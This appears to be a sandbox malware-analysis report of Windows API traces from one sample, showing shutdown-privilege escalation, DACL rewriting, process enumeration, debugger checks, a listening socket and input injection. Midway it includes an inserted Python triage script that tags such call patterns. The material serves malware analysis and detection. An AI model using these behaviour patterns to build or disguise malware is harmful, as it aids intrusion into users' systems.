                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                • API String ID: 3393021363-188983378
                                                                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1409584000-438819550
                                                                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                • __swprintf.LIBCMT ref: 00431C2E
                                                                                                • _wcslen.LIBCMT ref: 00431C3A
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                • String ID: :$\$\??\%s
                                                                                                • API String ID: 2192556992-3457252023
                                                                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                • __swprintf.LIBCMT ref: 004722B9
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderPath$LocalTime__swprintf
                                                                                                • String ID: %.3d
                                                                                                • API String ID: 3337348382-986655627
                                                                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                • String ID: *.*
                                                                                                • API String ID: 2640511053-438819550
                                                                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                • GetLastError.KERNEL32 ref: 00433414
                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 2938487562-3733053543
                                                                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                APIs
                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                Similarity
                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                • String ID:
                                                                                                • API String ID: 1255039815-0
                                                                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                APIs
                                                                                                • __swprintf.LIBCMT ref: 00433073
                                                                                                • __swprintf.LIBCMT ref: 00433085
                                                                                                • __wcsicoll.LIBCMT ref: 00433092
                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                • LockResource.KERNEL32(?), ref: 00433120
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                • String ID:
                                                                                                • API String ID: 1158019794-0
                                                                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1737998785-0
                                                                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                • API String ID: 4194297153-14809454
                                                                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                APIs
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: _memmove$_strncmp
                                                                                                • String ID: @oH$\$^$h
                                                                                                • API String ID: 2175499884-3701065813
                                                                                                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                APIs
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                • String ID:
                                                                                                • API String ID: 540024437-0
                                                                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
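The traces above (the SeShutdownPrivilege/ExitWindowsEx sequence, the user-object DACL rewrite ending in SetUserObjectSecurity, the FindResourceW/LoadResource/LockResource lookup and the socket/bind/listen function) are easier to triage mechanically than by eye. The following Python is an added example, not part of the Joe Sandbox report and not the sample's code: it parses trace lines in the format printed here, splits them per function on the "APIs" header, and tags functions whose call set matches a small table of heuristics. The function names, the `RULES` table and its tag names are this example's own constructions, and `SAMPLE` is copied from three of the trace blocks above; the only non-constructed values are the Winsock constants (AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6), which are standard SDK definitions.

```python
# Added example, not Joe Sandbox's code: parse the per-function API traces
# printed in this report and tag call sets worth triaging first.
import re

# One trace line: bullet, optional "Part of subcall function XXXXXXXX:" prefix,
# API.MODULE, optional argument list, then "ref: <call-site address>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Constructed heuristics (not the sandbox's signatures): every API in a set
# must occur in one function; subcall lines count, since the report lists
# them as part of that function's behaviour.
RULES = {
    "shutdown-with-privilege": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "user-object-dacl-rewrite": {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"},
    "embedded-resource-read": {"FindResourceW", "LoadResource", "LockResource"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "listening-socket": {"socket", "bind", "listen"},
}

# Standard Winsock constants for the socket() arguments decoded below.
AF = {2: "AF_INET"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def parse_calls(text):
    """Every trace line in text as a dict, in report order; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [] if raw is None else [a.strip() for a in raw.split(",")],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),
        })
    return calls


def split_functions(text):
    """One block per function: the report opens each trace with an 'APIs' header."""
    blocks = re.split(r"^\s*APIs\s*$", text, flags=re.M)
    return [b for b in blocks if parse_calls(b)]


def classify(calls):
    """Names of the RULES whose API set is fully present in these calls."""
    seen = {c["api"] for c in calls}
    return sorted(name for name, need in RULES.items() if need <= seen)


def hex_arg(arg):
    # '?' is printed when the sandbox could not resolve the argument value.
    return None if arg == "?" else int(arg, 16)


def describe_socket(calls):
    """Render socket()/listen() arguments with their symbolic names."""
    out = []
    for c in calls:
        a = c["args"]
        if c["api"] == "socket" and len(a) >= 3:
            af, st, pr = (hex_arg(x) for x in a[:3])
            out.append(f"socket({AF.get(af, af)}, {SOCK_TYPE.get(st, st)}, {PROTO.get(pr, pr)})")
        elif c["api"] == "listen" and len(a) >= 2:
            out.append(f"listen(backlog={hex_arg(a[1])})")
    return out


def triage(text):
    """Map each flagged function, keyed by its first direct call site, to its tags."""
    result = {}
    for block in split_functions(text):
        calls = parse_calls(block)
        tags = classify(calls)
        if tags:
            direct = [c for c in calls if c["subcall"] is None]
            result[(direct or calls)[0]["ref"]] = tags
    return result


# Constructed input: trace lines copied from three of the functions above.
SAMPLE = """\
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
APIs
  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
APIs
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
• bind.WSOCK32(00000000,?,00000010), ref: 00465356
• listen.WSOCK32(00000000,00000005), ref: 00465381
"""

if __name__ == "__main__":
    print(triage(SAMPLE), describe_socket(parse_calls(SAMPLE)))
```

On the sample above `triage` flags the three functions by the address of their first direct call and `describe_socket` renders the socket as `socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)` with `listen(backlog=5)`. A `?` argument is kept as `None` rather than guessed, so decoders never report a constant the sandbox did not actually observe; the rule table is deliberately a set-containment check on one function's calls, which is cheap and does not depend on call order but will also match benign code that uses the same APIs, so treat a tag as a place to start reading, not as a verdict.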
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                • API String ID: 0-2872873767
                                                                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
• __wsplitpath.LIBCMT ref: 00475644
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscat.LIBCMT ref: 00475657
• __wcsicoll.LIBCMT ref: 0047567B
• Process32NextW.KERNEL32(00000000,?), ref: 004756AB
• CloseHandle.KERNEL32(00000000), ref: 004756BA
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• FindFirstFileW.KERNEL32(?,?), ref: 004524DF
• Sleep.KERNEL32(0000000A), ref: 0045250B
• FindNextFileW.KERNEL32(?,?), ref: 004525E9
• FindClose.KERNEL32(?), ref: 004525FF
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
• String ID: *.*$\VH
• API String ID: 2786137511-2657498754
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
• API String ID: 2579439406-2459173057
APIs
• __wcsicoll.LIBCMT ref: 00433349
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
• __wcsicoll.LIBCMT ref: 00433375
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
APIs
• GetKeyboardState.USER32(?), ref: 0044C3D2
• SetKeyboardState.USER32(00000080), ref: 0044C3F6
• PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
• PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
